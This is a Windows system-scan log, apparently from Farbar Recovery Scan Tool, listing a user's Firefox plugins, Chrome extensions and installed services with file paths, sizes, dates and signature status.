FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default [2017-03-16]
CHR Extension: (Prezentace Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-03-15]
CHR Extension: (Dokumenty Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-03-15]
CHR Extension: (Disk Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-15]
CHR Extension: (YouTube) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-15]
CHR Extension: (Tabulky Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-03-15]
CHR Extension: (Dokumenty Google offline) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-16]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-15]
CHR Extension: (Gmail) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-15]
CHR Extension: (Chrome Media Router) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-15]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 gpsvc; C:\WINDOWS\System32\gpsvc.dll [1227264 2017-03-04] (Microsoft Corporation) [File not signed]
R2 nsi; C:\WINDOWS\System32\nsisvc.dll [30720 2016-07-16] (Microsoft Corporation) [File not signed]
U2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-07-01] (Autodesk Inc.)
U3 AJRouter; C:\WINDOWS\System32\AJRouter.dll [24576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ALG; C:\WINDOWS\System32\alg.exe [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AppIDSvc; C:\WINDOWS\System32\appidsvc.dll [124416 2016-07-16] (Microsoft Corporation) [File not signed]
R3 Appinfo; C:\WINDOWS\System32\appinfo.dll [125952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppReadiness; C:\WINDOWS\system32\AppReadiness.dll [560128 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppXSvc; C:\WINDOWS\system32\appxdeploymentserver.dll [2278400 2017-03-04] (Microsoft Corporation) [File not signed]
U2 AudioEndpointBuilder; C:\WINDOWS\System32\AudioEndpointBuilder.dll [337920 2016-11-02] (Microsoft Corporation) [File not signed]
R2 Audiosrv; C:\WINDOWS\System32\Audiosrv.dll [942080 2016-11-02] (Microsoft Corporation) [File not signed]
U3 AxInstSV; C:\WINDOWS\System32\AxInstSV.dll [113664 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BDESVC; C:\WINDOWS\System32\bdesvc.dll [361472 2016-09-15] (Microsoft Corporation) [File not signed]
U2 BFE; C:\WINDOWS\System32\bfe.dll [795648 2016-07-16] (Microsoft Corporation) [File not signed]
U2 BITS; C:\WINDOWS\System32\qmgr.dll [1054208 2016-10-15] (Microsoft Corporation) [File not signed]
U2 BrokerInfrastructure; C:\WINDOWS\System32\bisrv.dll [770560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Browser; C:\WINDOWS\System32\browser.dll [134656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFSrv; C:\WINDOWS\System32\BthHFSrv.dll [321536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthserv; C:\WINDOWS\system32\bthserv.dll [157184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 CDPSvc; C:\WINDOWS\System32\CDPSvc.dll [411648 2016-11-11] (Microsoft Corporation) [File not signed]
U2 CDPUserSvc; C:\WINDOWS\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation) [File not signed]
U3 CertPropSvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [6758568 2016-12-28] (COMODO)
U3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876088 2016-12-28] (COMODO)
U2 CoreMessagingRegistrar; C:\WINDOWS\SysWOW64\coremessaging.dll [483840 2017-03-04] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\WINDOWS\system32\cryptsvc.dll [81920 2016-07-16] (Microsoft Corporation) [File not signed]
R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DcpSvc; C:\WINDOWS\system32\dcpsvc.dll [183808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 defragsvc; C:\WINDOWS\System32\defragsvc.dll [511488 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DeviceAssociationService; C:\WINDOWS\system32\das.dll [447488 2016-09-27] (Microsoft Corporation) [File not signed]
U3 DeviceInstall; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DevQueryBroker; C:\WINDOWS\system32\DevQueryBroker.dll [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\system32\dhcpcore.dll [360960 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\SysWOW64\dhcpcore.dll [292864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 diagnosticshub.standardcollector.service; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [93184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DiagTrack; C:\WINDOWS\system32\diagtrack.dll [1981440 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
U3 DmEnrollmentSvc; C:\WINDOWS\system32\Windows.Internal.Management.dll [407552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 DmEnrollmentSvc; C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll [298496 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmwappushservice; C:\WINDOWS\system32\dmwappushsvc.dll [57344 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [264704 2017-03-04] (Microsoft Corporation) [File not signed]
U2 DoSvc; C:\WINDOWS\system32\dosvc.dll [1231872 2016-12-14] (Microsoft Corporation) [File not signed]
U3 dot3svc; C:\WINDOWS\System32\dot3svc.dll [262144 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DPS; C:\WINDOWS\system32\dps.dll [172032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsmSvc; C:\WINDOWS\System32\DeviceSetupManager.dll [197632 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsSvc; C:\WINDOWS\System32\DsSvc.dll [152576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EapHost; C:\WINDOWS\System32\eapsvc.dll [112128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EFS; C:\WINDOWS\system32\efssvc.dll [55296 2016-07-16] (Microsoft Corporation) [File not signed]
U3 embeddedmode; C:\WINDOWS\System32\embeddedmodesvc.dll [140800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EntAppSvc; C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll [285696 2016-11-11] (Microsoft Corporation) [File not signed]
U2 EventLog; C:\WINDOWS\System32\wevtsvc.dll [1709056 2016-09-15] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\system32\es.dll [453632 2016-07-16] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\SysWOW64\es.dll [347136 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Fax; C:\WINDOWS\system32\fxssvc.exe [644608 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdPHost; C:\WINDOWS\system32\fdPHost.dll [20992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 FDResPub; C:\WINDOWS\system32\fdrespub.dll [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fhsvc; C:\WINDOWS\system32\fhsvc.dll [122368 2016-07-16] (Microsoft Corporation) [File not signed]
U2 FontCache; C:\WINDOWS\system32\FntCache.dll [1840640 2017-03-04] (Microsoft Corporation) [File not signed]
U3 FrameServer; C:\WINDOWS\system32\FrameServer.dll [805888 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [520416 2014-01-28] (Futuremark)
U3 hidserv; C:\WINDOWS\system32\hidserv.dll [36864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidserv; C:\WINDOWS\SysWOW64\hidserv.dll [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupListener; C:\WINDOWS\system32\ListSvc.dll [274432 2016-11-02] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\system32\provsvc.dll [447488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\SysWOW64\provsvc.dll [385536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HvHost; C:\WINDOWS\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation) [File not signed]
U3 icssvc; C:\WINDOWS\System32\tetheringservice.dll [202240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IKEEXT; C:\WINDOWS\System32\ikeext.dll [932352 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
U4 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
U2 iphlpsvc; C:\WINDOWS\System32\iphlpsvc.dll [945664 2017-03-04] (Microsoft Corporation) [File not signed]
U3 irmon; C:\WINDOWS\System32\irmon.dll [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
U2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
U3 KeyIso; C:\WINDOWS\system32\keyiso.dll [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KeyIso; C:\WINDOWS\SysWOW64\keyiso.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KtmRm; C:\WINDOWS\system32\msdtckrm.dll [376320 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LanmanServer; C:\WINDOWS\system32\srvsvc.dll [305152 2016-07-16] (Microsoft Corporation) [File not signed]
R2 LanmanWorkstation; C:\WINDOWS\System32\wkssvc.dll [283648 2016-11-11] (Microsoft Corporation) [File not signed]
U3 lfsvc; C:\WINDOWS\System32\lfsvc.dll [37376 2016-07-16] (Microsoft Corporation) [File not signed]
U3 LicenseManager; C:\WINDOWS\system32\LicenseManagerSvc.dll [26112 2016-09-27] (Microsoft Corporation) [File not signed]
U3 lltdsvc; C:\WINDOWS\System32\lltdsvc.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 lmhosts; C:\WINDOWS\System32\lmhsvc.dll [27136 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
U2 LSM; C:\WINDOWS\System32\lsm.dll [691712 2016-11-11] (Microsoft Corporation) [File not signed]
U2 MapsBroker; C:\WINDOWS\System32\moshost.dll [82944 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
U3 MessagingService; C:\WINDOWS\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MpsSvc; C:\WINDOWS\system32\mpssvc.dll [893952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 MSDTC; C:\WINDOWS\System32\msdtc.exe [147456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSiSCSI; C:\WINDOWS\system32\iscsiexe.dll [151552 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\System32\msiexec.exe [65024 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\SysWOW64\msiexec.exe [58368 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcaSvc; C:\WINDOWS\System32\ncasvc.dll [167936 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcbService; C:\WINDOWS\System32\ncbservice.dll [339968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcdAutoSetup; C:\WINDOWS\System32\NcdAutoSetup.dll [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\system32\netlogon.dll [827392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\SysWOW64\netlogon.dll [670720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netman; C:\WINDOWS\System32\netman.dll [259072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 netprofm; C:\WINDOWS\System32\netprofmsvc.dll [519168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetSetupSvc; C:\WINDOWS\System32\NetSetupSvc.dll [265728 2016-11-02] (Microsoft Corporation) [File not signed]
U3 NgcCtnrSvc; C:\WINDOWS\System32\NgcCtnrSvc.dll [330752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NgcSvc; C:\WINDOWS\system32\ngcsvc.dll [983040 2016-10-05] (Microsoft Corporation) [File not signed]
U2 NlaSvc; C:\WINDOWS\System32\nlasvc.dll [368640 2016-10-05] (Microsoft Corporation) [File not signed]
U3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [6053312 2016-08-22] (INCA Internet Co., Ltd.)
U2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
U2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-23] (NVIDIA Corporation)
U2 OneSyncSvc; C:\WINDOWS\System32\APHostService.dll [366592 2016-07-16] (Microsoft Corporation) [File not signed]
U2 OODefragAgent; C:\Program Files\OO Software\Defrag\oodag.exe [1660200 2014-08-29] (O&O Software GmbH)
U4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-02] (Electronic Arts)
U3 p2pimsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 p2psvc; C:\WINDOWS\system32\p2psvc.dll [425472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PerfHost; C:\WINDOWS\SysWow64\perfhost.exe [21504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PhoneSvc; C:\WINDOWS\System32\PhoneService.dll [781824 2016-09-27] (Microsoft Corporation) [File not signed]
U3 PimIndexMaintenanceSvc; C:\WINDOWS\System32\PimIndexMaintenance.dll [203264 2017-03-04] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\system32\pla.dll [1457152 2016-07-16] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\SysWOW64\pla.dll [1536512 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PlugPlay; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPAutoReg; C:\WINDOWS\system32\pnrpauto.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PolicyAgent; C:\WINDOWS\System32\ipsecsvc.dll [391168 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Power; C:\WINDOWS\system32\umpo.dll [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PrintNotify; C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll [3318784 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ProfSvc; C:\WINDOWS\system32\profsvc.dll [358400 2016-09-15] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\system32\qwave.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\SysWOW64\qwave.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasAuto; C:\WINDOWS\System32\rasauto.dll [105472 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasMan; C:\WINDOWS\System32\rasmans.dll [658432 2017-03-04] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\System32\mprdim.dll [496128 2016-09-15] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\SysWOW64\mprdim.dll [431104 2016-09-15] (Microsoft Corporation) [File not signed]
U4 RemoteRegistry; C:\WINDOWS\system32\regsvc.dll [155648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RetailDemo; C:\WINDOWS\system32\RDXService.dll [650752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 RmSvc; C:\WINDOWS\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation) [File not signed]
R2 RpcEptMapper; C:\WINDOWS\System32\RpcEpMap.dll [79360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RpcLocator; C:\WINDOWS\system32\locator.exe [11264 2016-07-16] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SCardSvr; C:\WINDOWS\System32\SCardSvr.dll [250880 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ScDeviceEnum; C:\WINDOWS\System32\ScDeviceEnum.dll [201728 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Schedule; C:\WINDOWS\system32\schedsvc.dll [948224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SCPolicySvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SDRSVC; C:\WINDOWS\System32\SDRSVC.dll [147968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 seclogon; C:\WINDOWS\system32\seclogon.dll [31232 2016-07-16] (Microsoft Corporation) [File not signed]
R2 SENS; C:\WINDOWS\System32\sens.dll [70656 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensorDataService; C:\WINDOWS\System32\SensorDataService.exe [1312768 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SensorService; C:\WINDOWS\system32\SensorService.dll [417792 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensrSvc; C:\WINDOWS\system32\sensrsvc.dll [179200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\system32\sessenv.dll [387072 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\SysWOW64\sessenv.dll [331776 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SharedAccess; C:\WINDOWS\System32\ipnathlp.dll [541696 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [617472 2016-07-16] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\SysWOW64\shsvcs.dll [566784 2016-07-16] (Microsoft Corporation) [File not signed]
U4 shpamsvc; C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\System32\smphost.dll [23552 2016-08-06] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\SysWOW64\smphost.dll [20992 2016-08-06] (Microsoft Corporation) [File not signed]
U3 SmsRouter; C:\WINDOWS\system32\SmsRouterSvc.dll [590848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SNMPTRAP; C:\WINDOWS\System32\snmptrap.exe [15872 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Spooler; C:\WINDOWS\System32\spoolsv.exe [792576 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SSDPSRV; C:\WINDOWS\System32\ssdpsrv.dll [236544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SstpSvc; C:\WINDOWS\system32\sstpsvc.dll [209920 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\system32\windows.staterepository.dll [4136448 2016-11-11] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\SysWOW64\windows.staterepository.dll [3370496 2016-11-11] (Microsoft Corporation) [File not signed]
U2 stisvc; C:\WINDOWS\System32\wiaservc.dll [646656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StorSvc; C:\WINDOWS\system32\storsvc.dll [396800 2016-11-11] (Microsoft Corporation) [File not signed]
U3 svsvc; C:\WINDOWS\system32\svsvc.dll [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 swprv; C:\WINDOWS\System32\swprv.dll [467456 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SysMain; C:\WINDOWS\system32\sysmain.dll [944128 2016-07-16] (Microsoft Corporation) [File not signed]
U2 SystemEventsBroker; C:\WINDOWS\System32\SystemEventsBrokerServer.dll [387072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TabletInputService; C:\WINDOWS\System32\TabSvc.dll [148992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\System32\tapisrv.dll [309248 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\SysWOW64\tapisrv.dll [254976 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TermService; C:\WINDOWS\System32\termsrv.dll [987648 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Themes; C:\WINDOWS\system32\themeservice.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TieringEngineService; C:\WINDOWS\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tiledatamodelsvc; C:\WINDOWS\system32\tileobjserver.dll [574976 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TimeBrokerSvc; C:\WINDOWS\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation) [File not signed]
U2 TrkWks; C:\WINDOWS\System32\trkwks.dll [116736 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TrustedInstaller; C:\WINDOWS\servicing\TrustedInstaller.exe [122880 2016-11-11] (Microsoft Corporation) [File not signed]
U4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [809424 2015-10-27] (Tunngle.net GmbH) [File not signed]
U4 tzautoupdate; C:\WINDOWS\system32\tzautoupdate.dll [95232 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UI0Detect; C:\WINDOWS\system32\UI0Detect.exe [42496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmRdpService; C:\WINDOWS\System32\umrdp.dll [273408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\System32\unistore.dll [1184256 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\SysWOW64\unistore.dll [968704 2017-03-04] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\System32\upnphost.dll [440832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\SysWOW64\upnphost.dll [328192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UserDataSvc; C:\WINDOWS\System32\userdataservice.dll [1512448 2017-03-04] (Microsoft Corporation) [File not signed]
U2 UserManager; C:\WINDOWS\System32\usermgr.dll [1020928 2016-09-15] (Microsoft Corporation) [File not signed]
U3 UsoSvc; C:\WINDOWS\system32\usocore.dll [548864 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VaultSvc; C:\Windows\System32\vaultsvc.dll [358912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vds; C:\WINDOWS\System32\vds.exe [649216 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicguestinterface; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicheartbeat; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmickvpexchange; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicrdv; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicshutdown; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmictimesync; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvmsession; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvss; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VSS; C:\WINDOWS\system32\vssvc.exe [1443328 2017-03-04] (Microsoft Corporation) [File not signed]
U3 W32Time; C:\WINDOWS\system32\w32time.dll [520192 2016-09-27] (Microsoft Corporation) [File not signed]
U3 WalletService; C:\WINDOWS\system32\WalletService.dll [436224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wbengine; C:\WINDOWS\system32\wbengine.exe [1547264 2017-03-04] (Microsoft Corporation) [File not signed]
U2 WbioSrvc; C:\WINDOWS\System32\wbiosrvc.dll [837632 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Wcmsvc; C:\WINDOWS\System32\wcmsvc.dll [715776 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wcncsvc; C:\WINDOWS\System32\wcncsvc.dll [468992 2016-07-16] (Microsoft Corporation) [File not signed]
